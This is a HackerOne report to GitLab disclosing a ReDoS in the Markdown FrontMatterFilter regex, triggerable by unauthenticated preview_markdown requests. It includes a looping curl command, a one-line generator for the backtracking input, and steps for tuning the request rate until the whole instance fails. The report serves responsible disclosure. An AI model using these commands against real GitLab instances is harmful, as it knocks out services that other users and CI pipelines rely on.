ReDoS via FrontMatterFilter in any Markdown fields
HackerOne report #1943819 by ryhmnlfj
on 2023-04-12, assigned to @greg:
Report | Attachments | How To Reproduce
Report
Summary
I found the server-side ReDoS via FrontMatterFilter
in any Markdown fields.
An attacker can take down the GitLab instance by sending the unauthenticated requests which contain the crafted payload to the preview_markdown
endpoint.
Preparation before reproducing the bug
Please install the command line tools ruby
and curl
on your computer.
Also, please download FrontMatterFilter_ReDoS_payload.json
attached to this report.
These will be used in step 11 of the "Steps to reproduce" section.
And most importantly, please prepare a GitLab instance that you can use personally.
DO NOT try to reproduce this bug against gitlab.com
or other public instances.
Steps to reproduce
- Set up and launch your GitLab instance, and create a new account on it.
- Sign in to the account you created in step 1.
- Create a new public group and make a note of the public group name at this time.
- Sign out as you will be accessing as an unauthenticated user in the following steps.
- After launching your browser's developer tools, browse to the public group you created in step 3 as an unauthenticated user.
- Check the HTML rendered in step 5 and take a note of the content of
csrf-token
at this time.
- Check the request sent to your GitLab instance in step 5 and take a note the value of
_gitlab_session
at this time.
- Close your browser and open a command console.
- Let's construct the command to demonstrate the ReDoS. Replace each string in the command template according to the replacement table.
- Command template:
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:[CSRF_TOKEN_VALUE] --header Cookie:_gitlab_session=[SESSION_VALUE] --data [@]FrontMatterFilter_ReDoS_payload.json http://[YOUR_GITLAB_INSTANCE_DOMAIN]/groups/[PUBLIC_GROUP_NAME]/preview_markdown"); sleep 1; end'
- Replacement table:
String in the command template | Replace with |
---|---|
[CSRF_TOKEN_VALUE] |
the content of csrf-token noted in step 6 |
[SESSION_VALUE] |
the value of _gitlab_session noted in step 7 |
[YOUR_GITLAB_INSTANCE_DOMAIN] |
the domain string of your instance |
[PUBLIC_GROUP_NAME] |
the public group name noted in step 3 |
For reference, here's an example in my local environment:
ruby -e 'while true do p spawn("curl --header Content-Type:application/json --header X-CSRF-Token:E_NhtPEqA7IpGGSH0jgsfRtruz5fAeeqRxQgBn-kl2mCkdxxBHP4HC9YdK6_mDdZqxCkhzkjSzESZOvAGwJQPQ --header Cookie:_gitlab_session=26c454aeadefc013a10a0fdddabcfd12 --data [@]FrontMatterFilter_ReDoS_payload.json http://my-gitlab-h1.test/groups/public_group_for_test/preview_markdown"); sleep 1; end'
- Change the current directory of the command console to the directory where
FrontMatterFilter_ReDoS_payload.json
is saved. - Run the command constructed in step 9 in the command console, and confirm the significant consumption of CPU resource.
For reference, when I ran the above command, the CPU resource of my instance with 16 CPU cores and 32GB of memory was quickly exhausted.
NOTE: If you can confirm a surge in CPU usage at step 11, that's enough confirmation that this bug is a valid ReDoS vulnerability, based on past valid reports.
NOTE 2: This crafted command will keep sending requests until you force it to stop. Please be sure to terminate the command after confirming the vulnerability.
Details about the command constructed in step 9:
The executed command send 1 request per second, and each 1 request that triggers ReDoS exhaust the resources of 1 CPU core.
The GitLab instance has the default timeout of 60 seconds per request. However, because the load per request is too high, there are many worker processes that do not finish processing even after the timeout has passed.
A:H
and S:C
criteria
Additional informations to confirm this vulnerability meets the IMPORTANT NOTE: This section contains additional information to confirm that this vulnerability meets the criteria for A:H
and S:C
. Please use this information after triage, as this section contains time-consuming steps and may be an over-verification of whether this report is valid.
If the GitLab instance is attacked at a well-tuned RPS(requests per second) rate for a reasonable amount of time, then as long as the attack continues, the instance will take 60+ seconds to process every single request.
This indicates that timeouts are not working well under heavy load.
As a result, 500 error
will be returned for each and every request.
I describe below how to attack at a well-tuned RPS rate for a reasonable amount of time by using the command constructed in step 9 of "Steps to reproduce" section of this report.
-
Before running the constructed command, maintain separate session as an authenticated user by signing into the instance with a different browser than the one that obtained the unauthenticated user's CSRF token and session.
-
Iterate on executing the constructed command and adjusting the RPS rate.
The constructed command will display the PIDs of the spawnedcurl
processes and the responses from the instance in the console.
Please adjust the RPS rate as described below so that 1 or 2 PIDs and several500 error
responses are alternately displayed.- We can adjust the RPS rate by changing the
sleep
value at the end of the command. For example, changing tosleep 1;
will result inRPS = 1
,sleep 0.5;
will result inRPS = 2
, andsleep 2;
will result inRPS = 0.5
. - We need to adjust the RPS rate so that it does not exceed the "Test RPS rates" (discribed in "Clarifying notes"). As an example, for the 1k Reference Architecture, "Test RPS rates" is 2 RPS.
NOTE: Since the default timeout is 60 seconds, we need to wait a few minutes after executing the command to see the PID and error response alternately displayed. There is no problem if the PIDs is displayed continuously occasionally, but if it is clearly not working, please stop the command and adjust the RPS rate.
- We can adjust the RPS rate by changing the
-
With the tuned command still running, visit any page on the instance with the authenticated user's session maintained in step 1 of this section.
And check if the500 error
is returned after a response delay of 60+ seconds.
After you start getting500 errors
for authenticated requests, wait tens of minutes and you'll start getting500 errors
for unauthenticated requests and requests to the API.NOTE: This behavior seems to occur because handling authenticated requests tends to be more complex than handling unauthenticated requests.
When I tested it on my instance, it took about 10-20 minutes at a rate of 1 RPS for my instance (16 CPU cores and 32GB of memory) to reach the above DoS state.
Also, when I looked at the runner logs in this state, I could see that the runner was failing to pick up the jobs.
$ sudo docker logs my_runner_container
[...snip...]
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
WARNING: Checking for jobs... failed runner=REDACTED status=POST http://my-gitlab-h1.test/api/v4/jobs/request: 500 Internal Server Error
Since I was using the gitlab/gitlab-runner:alpine
image for testing, I ran docker logs
command to see the runner logs.
Additionally, in a pipeline that started overlapping the above DoS state, the jobs failed with timeout because the runner was unable to communicate with the instance, and subsequent job on the pipeline was not run.
These mean that the instance has been completely taken down, so this vulnerability fully meets A:H
criteria.
It also meets S:C
criteria because the instance returns 500 error
for any HTTP request from other components and impacts the behavior of other components in no small way.
What is the current bug behavior?
The vulnerable regular expression exists in the following part of the source code.
https://gitlab.com/gitlab-org/gitlab/-/blob/v15.10.2-ee/lib/gitlab/front_matter.rb#L3-20
module Gitlab
module FrontMatter
DELIM_LANG = {
'---' => 'yaml',
'+++' => 'toml',
';;;' => 'json'
}.freeze
DELIM = Regexp.union(DELIM_LANG.keys)
PATTERN = %r{
\A(?<encoding>[^\r\n]*coding:[^\r\n]*\R)? # optional encoding line
(?<before>\s*)
^(?<delim>#{DELIM})[ \t]*(?<lang>\S*)\R # opening front matter marker (optional language specifier)
(?<front_matter>.*?) # front matter block content (not greedy)
^(\k<delim> | \.{3}) # closing front matter marker
[^\S\r\n]*(\R|\z)
}mx.freeze
Performing regular expression matching with Gitlab::FrontMatter::PATTERN
on the specially crafted string causes severe backtracking.
This crafted string can be easily generated with the Ruby code "coding:" * 120_000 + "\n" * 80_000 + ";"
.
The matching with Gitlab::FrontMatter::PATTERN
against the actual input string is performed in the FrontMatterFilter::call
method below.
module Banzai
module Filter
class FrontMatterFilter < HTML::Pipeline::Filter
def call
lang_mapping = Gitlab::FrontMatter::DELIM_LANG
html.sub(Gitlab::FrontMatter::PATTERN) do |_match|
What is the expected correct behavior?
We should either rewrite Gitlab::FrontMatter::PATTERN
so that it doesn't cause severe backtracking, or write code that does the equivalent without using regular expressions.
Relevant logs and/or screenshots
I put references to the screenshots at the appropriate places in this report.
I also attach the stack trace when one request was forcefully stopped after 60+ seconds.
Rack::Timeout::RequestTimeoutException (Request ran for longer than 60000ms ):
lib/banzai/filter/front_matter_filter.rb:9:in `sub'
lib/banzai/filter/front_matter_filter.rb:9:in `call'
lib/banzai/pipeline/base_pipeline.rb:23:in `block (2 levels) in singleton class'
lib/banzai/renderer.rb:128:in `render_result'
lib/banzai/renderer.rb:166:in `cacheless_render'
lib/banzai/renderer.rb:30:in `render'
lib/banzai/renderer.rb:120:in `block in cache_collection_render'
lib/banzai/renderer.rb:119:in `each'
lib/banzai/renderer.rb:119:in `cache_collection_render'
lib/banzai/reference_extractor.rb:33:in `html_documents'
lib/banzai/reference_extractor.rb:18:in `references'
lib/gitlab/reference_extractor.rb:24:in `references'
lib/gitlab/reference_extractor.rb:43:in `block (2 levels) in <class:ReferenceExtractor>'
app/services/preview_markdown_service.rb:33:in `find_user_references'
app/services/preview_markdown_service.rb:6:in `execute'
app/controllers/concerns/preview_markdown.rb:8:in `preview_markdown'
ee/lib/gitlab/ip_address_state.rb:10:in `with'
ee/app/controllers/ee/application_controller.rb:46:in `set_current_ip_address'
app/controllers/application_controller.rb:524:in `set_current_admin'
lib/gitlab/session.rb:11:in `with_session'
app/controllers/application_controller.rb:515:in `set_session_storage'
lib/gitlab/i18n.rb:107:in `with_locale'
app/controllers/application_controller.rb:508:in `set_locale'
app/controllers/application_controller.rb:499:in `set_current_context'
lib/gitlab/metrics/elasticsearch_rack_middleware.rb:16:in `call'
lib/gitlab/middleware/memory_report.rb:13:in `call'
lib/gitlab/middleware/speedscope.rb:13:in `call'
lib/gitlab/database/load_balancing/rack_middleware.rb:23:in `call'
lib/gitlab/middleware/rails_queue_duration.rb:33:in `call'
lib/gitlab/metrics/rack_middleware.rb:16:in `block in call'
lib/gitlab/metrics/web_transaction.rb:46:in `run'
lib/gitlab/metrics/rack_middleware.rb:16:in `call'
lib/gitlab/jira/middleware.rb:19:in `call'
lib/gitlab/middleware/go.rb:20:in `call'
lib/gitlab/etag_caching/middleware.rb:21:in `call'
lib/gitlab/middleware/query_analyzer.rb:11:in `block in call'
lib/gitlab/database/query_analyzer.rb:37:in `within'
lib/gitlab/middleware/query_analyzer.rb:11:in `call'
lib/gitlab/middleware/multipart.rb:173:in `call'
lib/gitlab/middleware/read_only/controller.rb:50:in `call'
lib/gitlab/middleware/read_only.rb:18:in `call'
lib/gitlab/middleware/same_site_cookies.rb:27:in `call'
lib/gitlab/middleware/basic_health_check.rb:25:in `call'
lib/gitlab/middleware/handle_malformed_strings.rb:21:in `call'
lib/gitlab/middleware/handle_ip_spoof_attack_error.rb:25:in `call'
lib/gitlab/middleware/request_context.rb:21:in `call'
lib/gitlab/middleware/webhook_recursion_detection.rb:15:in `call'
config/initializers/fix_local_cache_middleware.rb:11:in `call'
lib/gitlab/middleware/compressed_json.rb:37:in `call'
lib/gitlab/middleware/rack_multipart_tempfile_factory.rb:19:in `call'
lib/gitlab/middleware/sidekiq_web_static.rb:20:in `call'
lib/gitlab/metrics/requests_rack_middleware.rb:79:in `call'
lib/gitlab/middleware/release_env.rb:13:in `call'
Output of checks
This bug happens on the official Docker installation of GitLab Enterprise Edition 15.10.2-ee
.
I used Chromium 112
and Firefox 112
on Debian 11 to verify this bug.
Results of GitLab environment info
Output of sudo gitlab-rake gitlab:env:info
:
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.0.5p211
Gem Version: 3.2.33
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.11
Sidekiq Version:6.5.7
Go Version: unknown
GitLab information
Version: 15.10.2-ee
Revision: a54d6973eae
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.8
URL: http://my-gitlab-h1.test
HTTP Clone URL: http://my-gitlab-h1.test/some-group/some-project.git
SSH Clone URL: git@my-gitlab-h1.test:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.18.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
By exploiting this ReDoS vulnerability, an unauthenticated attacker could significantly reduce the availability of the entire the GitLab instance.
Based on the policy of GitLab's Bug Bounty Program, past reports, and my research on the impact of this bug, I would suggest the following CVSS score:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
8.6 (High)
I would also like to add some detailed explanations of the notable points in the above score.
-
PR:N
: As described in the "Steps to reproduce" section, this attack can be performed by an unauthenticated attacker. -
S:C
: Since this ReDoS attack causes all endpoints of the GitLab instance to become unresponsive, it also affects the behavior of other components that rely on HTTP communication with the instance. For example, user-configured integrations, uploading artifacts from runners, GitLab Pages that rely on downloading artifacts, etc. are affected by the unresponsive state of the GitLab instance. -
A:H
: This ReDoS attack causes enough load to meet theA:H
criteria for the 1k Reference Architecture as stated in GitLab CVSS Calculator page.
More specifically, this attack clearly satisfies the "Clarifying notes" condition in GitLab CVSS Calculator page.
When evaluating Availability impacts for DoS that require sustained traffic, use the 1k Reference Architecture. The number of requests must be fewer than the "test request per seconds rates" and cause 10+ seconds of user-perceivable unavailability to rate the impact as
A:H
.
In addition to the above, it is important to note that any feature with Markdown fields is vulnerable to this ReDoS attack.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- FrontMatterFilter_ReDoS_payload.json
- create_public_group.png
- csrf_token.png
- session_value.png
- htop_all_cores_exhausted.png
- 500_error.png
- failed_pipeline.png
- failed_jobs_timeout.png
How To Reproduce
Please add reproducibility information to this section: